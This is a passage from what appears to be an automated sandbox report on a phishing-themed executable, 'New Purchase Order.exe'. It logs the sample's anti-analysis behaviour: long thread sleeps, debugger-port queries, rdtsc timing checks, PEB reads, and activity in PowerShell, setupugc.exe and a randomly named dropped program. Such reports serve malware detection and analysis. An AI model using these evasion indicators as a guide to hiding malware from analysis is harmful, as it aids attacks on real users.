            Source: C:\Windows\SysWOW64\setupugc.exe TID: 7896Thread sleep count: 981 > 30
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 7896Thread sleep time: -1962000s >= -30000s
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 7896Thread sleep count: 8991 > 30
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 7896Thread sleep time: -17982000s >= -30000s
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe TID: 7916Thread sleep time: -80000s >= -30000s
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe TID: 7916Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe TID: 7916Thread sleep time: -40000s >= -30000s
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe TID: 7916Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe TID: 7916Thread sleep time: -48000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E6C520 FindFirstFileW,FindNextFileW,FindClose,17_2_02E6C520
            Source: C:\Users\user\Desktop\New Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: firefox.exe, 00000015.00000002.2197655167.00000194F8B8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
            Source: kdFPsEWDpy.exe, 00000014.00000002.4111420407.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\setupugc.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0117096E rdtsc 8_2_0117096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00417733 LdrLoadDll,8_2_00417733
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DA118 mov ecx, dword ptr fs:[00000030h]8_2_011DA118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DA118 mov eax, dword ptr fs:[00000030h]8_2_011DA118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DA118 mov eax, dword ptr fs:[00000030h]8_2_011DA118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DA118 mov eax, dword ptr fs:[00000030h]8_2_011DA118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F0115 mov eax, dword ptr fs:[00000030h]8_2_011F0115
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE10E mov eax, dword ptr fs:[00000030h]8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE10E mov ecx, dword ptr fs:[00000030h]8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE10E mov eax, dword ptr fs:[00000030h]8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE10E mov eax, dword ptr fs:[00000030h]8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE10E mov ecx, dword ptr fs:[00000030h]8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE10E mov eax, dword ptr fs:[00000030h]8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE10E mov eax, dword ptr fs:[00000030h]8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE10E mov ecx, dword ptr fs:[00000030h]8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE10E mov eax, dword ptr fs:[00000030h]8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE10E mov ecx, dword ptr fs:[00000030h]8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01160124 mov eax, dword ptr fs:[00000030h]8_2_01160124
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112C156 mov eax, dword ptr fs:[00000030h]8_2_0112C156
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C8158 mov eax, dword ptr fs:[00000030h]8_2_011C8158
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204164 mov eax, dword ptr fs:[00000030h]8_2_01204164
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204164 mov eax, dword ptr fs:[00000030h]8_2_01204164
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01136154 mov eax, dword ptr fs:[00000030h]8_2_01136154
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01136154 mov eax, dword ptr fs:[00000030h]8_2_01136154
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C4144 mov eax, dword ptr fs:[00000030h]8_2_011C4144
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C4144 mov eax, dword ptr fs:[00000030h]8_2_011C4144
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C4144 mov ecx, dword ptr fs:[00000030h]8_2_011C4144
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C4144 mov eax, dword ptr fs:[00000030h]8_2_011C4144
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C4144 mov eax, dword ptr fs:[00000030h]8_2_011C4144
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B019F mov eax, dword ptr fs:[00000030h]8_2_011B019F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B019F mov eax, dword ptr fs:[00000030h]8_2_011B019F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B019F mov eax, dword ptr fs:[00000030h]8_2_011B019F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B019F mov eax, dword ptr fs:[00000030h]8_2_011B019F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112A197 mov eax, dword ptr fs:[00000030h]8_2_0112A197
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112A197 mov eax, dword ptr fs:[00000030h]8_2_0112A197
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112A197 mov eax, dword ptr fs:[00000030h]8_2_0112A197
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01170185 mov eax, dword ptr fs:[00000030h]8_2_01170185
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EC188 mov eax, dword ptr fs:[00000030h]8_2_011EC188
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EC188 mov eax, dword ptr fs:[00000030h]8_2_011EC188
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D4180 mov eax, dword ptr fs:[00000030h]8_2_011D4180
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D4180 mov eax, dword ptr fs:[00000030h]8_2_011D4180
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012061E5 mov eax, dword ptr fs:[00000030h]8_2_012061E5
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE1D0 mov eax, dword ptr fs:[00000030h]8_2_011AE1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE1D0 mov eax, dword ptr fs:[00000030h]8_2_011AE1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE1D0 mov ecx, dword ptr fs:[00000030h]8_2_011AE1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE1D0 mov eax, dword ptr fs:[00000030h]8_2_011AE1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE1D0 mov eax, dword ptr fs:[00000030h]8_2_011AE1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F61C3 mov eax, dword ptr fs:[00000030h]8_2_011F61C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F61C3 mov eax, dword ptr fs:[00000030h]8_2_011F61C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011601F8 mov eax, dword ptr fs:[00000030h]8_2_011601F8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E016 mov eax, dword ptr fs:[00000030h]8_2_0114E016
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E016 mov eax, dword ptr fs:[00000030h]8_2_0114E016
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E016 mov eax, dword ptr fs:[00000030h]8_2_0114E016
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E016 mov eax, dword ptr fs:[00000030h]8_2_0114E016
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B4000 mov ecx, dword ptr fs:[00000030h]8_2_011B4000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C6030 mov eax, dword ptr fs:[00000030h]8_2_011C6030
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112A020 mov eax, dword ptr fs:[00000030h]8_2_0112A020
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112C020 mov eax, dword ptr fs:[00000030h]8_2_0112C020
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01132050 mov eax, dword ptr fs:[00000030h]8_2_01132050
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6050 mov eax, dword ptr fs:[00000030h]8_2_011B6050
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115C073 mov eax, dword ptr fs:[00000030h]8_2_0115C073
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113208A mov eax, dword ptr fs:[00000030h]8_2_0113208A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F60B8 mov eax, dword ptr fs:[00000030h]8_2_011F60B8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F60B8 mov ecx, dword ptr fs:[00000030h]8_2_011F60B8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011280A0 mov eax, dword ptr fs:[00000030h]8_2_011280A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C80A8 mov eax, dword ptr fs:[00000030h]8_2_011C80A8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B20DE mov eax, dword ptr fs:[00000030h]8_2_011B20DE
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112C0F0 mov eax, dword ptr fs:[00000030h]8_2_0112C0F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011720F0 mov ecx, dword ptr fs:[00000030h]8_2_011720F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0112A0E3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011380E9 mov eax, dword ptr fs:[00000030h]8_2_011380E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B60E0 mov eax, dword ptr fs:[00000030h]8_2_011B60E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112C310 mov ecx, dword ptr fs:[00000030h]8_2_0112C310
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01208324 mov eax, dword ptr fs:[00000030h]8_2_01208324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01208324 mov ecx, dword ptr fs:[00000030h]8_2_01208324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01208324 mov eax, dword ptr fs:[00000030h]8_2_01208324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01208324 mov eax, dword ptr fs:[00000030h]8_2_01208324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01150310 mov ecx, dword ptr fs:[00000030h]8_2_01150310
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A30B mov eax, dword ptr fs:[00000030h]8_2_0116A30B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A30B mov eax, dword ptr fs:[00000030h]8_2_0116A30B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A30B mov eax, dword ptr fs:[00000030h]8_2_0116A30B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov eax, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov eax, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov eax, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov ecx, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov eax, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov eax, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FA352 mov eax, dword ptr fs:[00000030h]8_2_011FA352
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D8350 mov ecx, dword ptr fs:[00000030h]8_2_011D8350
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D437C mov eax, dword ptr fs:[00000030h]8_2_011D437C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0120634F mov eax, dword ptr fs:[00000030h]8_2_0120634F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01128397 mov eax, dword ptr fs:[00000030h]8_2_01128397
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01128397 mov eax, dword ptr fs:[00000030h]8_2_01128397
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01128397 mov eax, dword ptr fs:[00000030h]8_2_01128397
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E388 mov eax, dword ptr fs:[00000030h]8_2_0112E388
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E388 mov eax, dword ptr fs:[00000030h]8_2_0112E388
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E388 mov eax, dword ptr fs:[00000030h]8_2_0112E388
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115438F mov eax, dword ptr fs:[00000030h]8_2_0115438F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115438F mov eax, dword ptr fs:[00000030h]8_2_0115438F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE3DB mov eax, dword ptr fs:[00000030h]8_2_011DE3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE3DB mov eax, dword ptr fs:[00000030h]8_2_011DE3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE3DB mov ecx, dword ptr fs:[00000030h]8_2_011DE3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE3DB mov eax, dword ptr fs:[00000030h]8_2_011DE3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D43D4 mov eax, dword ptr fs:[00000030h]8_2_011D43D4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D43D4 mov eax, dword ptr fs:[00000030h]8_2_011D43D4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EC3CD mov eax, dword ptr fs:[00000030h]8_2_011EC3CD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011383C0 mov eax, dword ptr fs:[00000030h]8_2_011383C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011383C0 mov eax, dword ptr fs:[00000030h]8_2_011383C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011383C0 mov eax, dword ptr fs:[00000030h]8_2_011383C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011383C0 mov eax, dword ptr fs:[00000030h]8_2_011383C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B63C0 mov eax, dword ptr fs:[00000030h]8_2_011B63C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E3F0 mov eax, dword ptr fs:[00000030h]8_2_0114E3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E3F0 mov eax, dword ptr fs:[00000030h]8_2_0114E3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E3F0 mov eax, dword ptr fs:[00000030h]8_2_0114E3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011663FF mov eax, dword ptr fs:[00000030h]8_2_011663FF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112823B mov eax, dword ptr fs:[00000030h]8_2_0112823B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112A250 mov eax, dword ptr fs:[00000030h]8_2_0112A250
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01136259 mov eax, dword ptr fs:[00000030h]8_2_01136259
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EA250 mov eax, dword ptr fs:[00000030h]8_2_011EA250
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EA250 mov eax, dword ptr fs:[00000030h]8_2_011EA250
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B8243 mov eax, dword ptr fs:[00000030h]8_2_011B8243
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B8243 mov ecx, dword ptr fs:[00000030h]8_2_011B8243
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01134260 mov eax, dword ptr fs:[00000030h]8_2_01134260
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01134260 mov eax, dword ptr fs:[00000030h]8_2_01134260
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01134260 mov eax, dword ptr fs:[00000030h]8_2_01134260
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112826B mov eax, dword ptr fs:[00000030h]8_2_0112826B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0120625D mov eax, dword ptr fs:[00000030h]8_2_0120625D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E284 mov eax, dword ptr fs:[00000030h]8_2_0116E284
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E284 mov eax, dword ptr fs:[00000030h]8_2_0116E284
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B0283 mov eax, dword ptr fs:[00000030h]8_2_011B0283
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B0283 mov eax, dword ptr fs:[00000030h]8_2_011B0283
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B0283 mov eax, dword ptr fs:[00000030h]8_2_011B0283
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011402A0 mov eax, dword ptr fs:[00000030h]8_2_011402A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011402A0 mov eax, dword ptr fs:[00000030h]8_2_011402A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov eax, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov ecx, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov eax, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov eax, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov eax, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov eax, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A2C3 mov eax, dword ptr fs:[00000030h]8_2_0113A2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A2C3 mov eax, dword ptr fs:[00000030h]8_2_0113A2C3
